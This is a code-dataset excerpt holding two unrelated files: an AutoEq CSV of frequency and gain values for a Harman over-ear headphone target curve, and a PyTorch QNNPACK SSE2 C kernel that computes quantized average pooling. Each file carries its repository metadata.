4761.96,2.84
4809.58,2.75
4857.67,2.66
4906.25,2.57
4955.31,2.49
5004.87,2.43
5054.91,2.40
5105.46,2.39
5156.52,2.41
5208.08,2.45
5260.16,2.52
5312.77,2.61
5365.89,2.72
5419.55,2.84
5473.75,2.99
5528.49,3.17
5583.77,3.38
5639.61,3.64
5696.00,3.89
5752.96,4.15
5810.49,4.41
5868.60,4.63
5927.28,4.84
5986.56,5.02
6046.42,5.15
6106.89,5.24
6167.96,5.29
6229.64,5.31
6291.93,5.29
6354.85,5.24
6418.40,5.17
6482.58,5.07
6547.41,4.94
6612.88,4.77
6679.01,4.57
6745.80,4.36
6813.26,4.15
6881.39,3.93
6950.21,3.71
7019.71,3.48
7089.91,3.25
7160.81,3.00
7232.41,2.74
7304.74,2.49
7377.79,2.27
7451.56,2.07
7526.08,1.90
7601.34,1.78
7677.35,1.72
7754.13,1.72
7831.67,1.79
7909.98,1.93
7989.08,2.12
8068.98,2.38
8149.67,2.71
8231.16,3.08
8313.47,3.54
8396.61,4.05
8480.57,4.60
8565.38,5.16
8651.03,5.72
8737.54,6.25
8824.92,6.74
8913.17,7.16
9002.30,7.52
9092.32,7.75
9183.25,7.87
9275.08,7.87
9367.83,7.76
9461.51,7.51
9556.12,7.12
9651.68,6.58
9748.20,5.94
9845.68,5.21
9944.14,4.41
10043.58,3.58
10144.02,2.75
10245.46,1.94
10347.91,1.17
10451.39,0.47
10555.91,-0.18
10661.46,-0.76
10768.08,-1.30
10875.76,-1.75
10984.52,-2.14
11094.36,-2.49
11205.31,-2.80
11317.36,-3.12
11430.53,-3.46
11544.84,-3.80
11660.29,-4.20
11776.89,-4.65
11894.66,-5.09
12013.60,-5.56
12133.74,-6.00
12255.08,-6.42
12377.63,-6.79
12501.41,-7.09
12626.42,-7.32
12752.68,-7.46
12880.21,-7.52
13009.01,-7.48
13139.10,-7.35
13270.49,-7.11
13403.20,-6.75
13537.23,-6.34
13672.60,-5.89
13809.33,-5.42
13947.42,-4.97
14086.90,-4.55
14227.77,-4.19
14370.04,-3.97
14513.74,-3.90
14658.88,-3.99
14805.47,-4.25
14953.52,-4.65
15103.06,-5.21
15254.09,-5.89
15406.63,-6.64
15560.70,-7.44
15716.30,-8.23
15873.47,-9.00
16032.20,-9.76
16192.52,-10.52
16354.45,-11.20
16517.99,-11.75
16683.17,-12.15
16850.01,-12.39
17018.51,-12.50
17188.69,-12.67
17360.58,-12.73
17534.18,-12.75
17709.53,-12.75
17886.62,-12.80
18065.49,-13.18
18246.14,-13.76
18428.60,-14.36
18612.89,-15.00
18799.02,-15.66
18987.01,-16.33
19176.88,-17.34
19368.65,-18.39
19562.33,-19.46
19757.96,-20.57
19955.54,-21.69
| CSV | 1 | vinzmc/AutoEq | research/calibration/crinacle_harman_over-ear_2018_wo_bass.csv | [
"MIT"
] |
/*
* Copyright (c) Facebook, Inc. and its affiliates.
* All rights reserved.
*
* This source code is licensed under the BSD-style license found in the
* LICENSE file in the root directory of this source tree.
*/
#include <assert.h>
#include <emmintrin.h>
#include <qnnpack/q8avgpool.h>
void pytorch_q8avgpool_ukernel_up8xm__sse2(
size_t n,
size_t ks,
size_t kc,
const uint8_t** input,
const uint8_t* zero,
uint8_t* output,
size_t input_increment,
size_t output_increment,
const union pytorch_qnnp_avgpool_quantization_params
quantization_params[RESTRICT_STATIC 1]) {
assert(n != 0);
assert(ks != 0);
assert(kc < 8);
const __m128i vbias =
_mm_load_si128((const __m128i*)&quantization_params->sse2.bias);
const __m128i vzero = _mm_setzero_si128();
const __m128 vscale = _mm_loadu_ps(quantization_params->sse2.scale);
do {
const uint8_t** next_input =
(const uint8_t**)((uintptr_t)input + input_increment);
__m128i vacc_lo = vbias;
__m128i vacc_hi = vbias;
size_t m = ks;
do {
const uint8_t* i = *input++;
i += kc;
__m128i vi = _mm_setzero_si128();
if (kc & 1) {
i -= 1;
vi = _mm_cvtsi32_si128((int)(uint32_t)*i);
}
if (kc & 2) {
vi = _mm_slli_epi32(vi, 16);
i -= 2;
vi = _mm_insert_epi16(vi, *((const uint16_t*)i), 0);
}
if (kc & 4) {
i -= 4;
vi = _mm_unpacklo_epi32(
_mm_cvtsi32_si128((int)*((const uint32_t*)i)), vi);
}
const __m128i vxi = _mm_unpacklo_epi8(vi, vzero);
vacc_lo = _mm_add_epi32(vacc_lo, _mm_unpacklo_epi16(vxi, vzero));
vacc_hi = _mm_add_epi32(vacc_hi, _mm_unpackhi_epi16(vxi, vzero));
} while (--m != 0);
input = next_input;
const __m128 vacc_lo_f = _mm_mul_ps(_mm_cvtepi32_ps(vacc_lo), vscale);
const __m128 vacc_hi_f = _mm_mul_ps(_mm_cvtepi32_ps(vacc_hi), vscale);
const __m128i vscaled_lo = _mm_cvtps_epi32(vacc_lo_f);
const __m128i vscaled_hi = _mm_cvtps_epi32(vacc_hi_f);
__m128i vout = _mm_packs_epi32(vscaled_lo, vscaled_hi);
vout = _mm_adds_epi16(
vout,
_mm_load_si128(
(const __m128i*)quantization_params->sse2.output_zero_point));
vout = _mm_packus_epi16(vout, vout);
vout = _mm_min_epu8(
vout,
_mm_load_si128((const __m128i*)quantization_params->sse2.output_max));
vout = _mm_max_epu8(
vout,
_mm_load_si128((const __m128i*)quantization_params->sse2.output_min));
if (kc & 4) {
*((uint32_t*)output) = (uint32_t)_mm_cvtsi128_si32(vout);
output += 4;
vout = _mm_srli_epi64(vout, 32);
}
if (kc & 2) {
*((uint16_t*)output) = (uint16_t)_mm_extract_epi16(vout, 0);
output += 2;
vout = _mm_srli_epi32(vout, 16);
}
if (kc & 1) {
*((uint8_t*)output) = (uint8_t)_mm_cvtsi128_si32(vout);
output += 1;
}
output = (uint8_t*)((uintptr_t)output + output_increment);
} while (--n != 0);
}
| C | 2 | Hacky-DH/pytorch | aten/src/ATen/native/quantized/cpu/qnnpack/src/q8avgpool/up8xm-sse2.c | [
"Intel"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.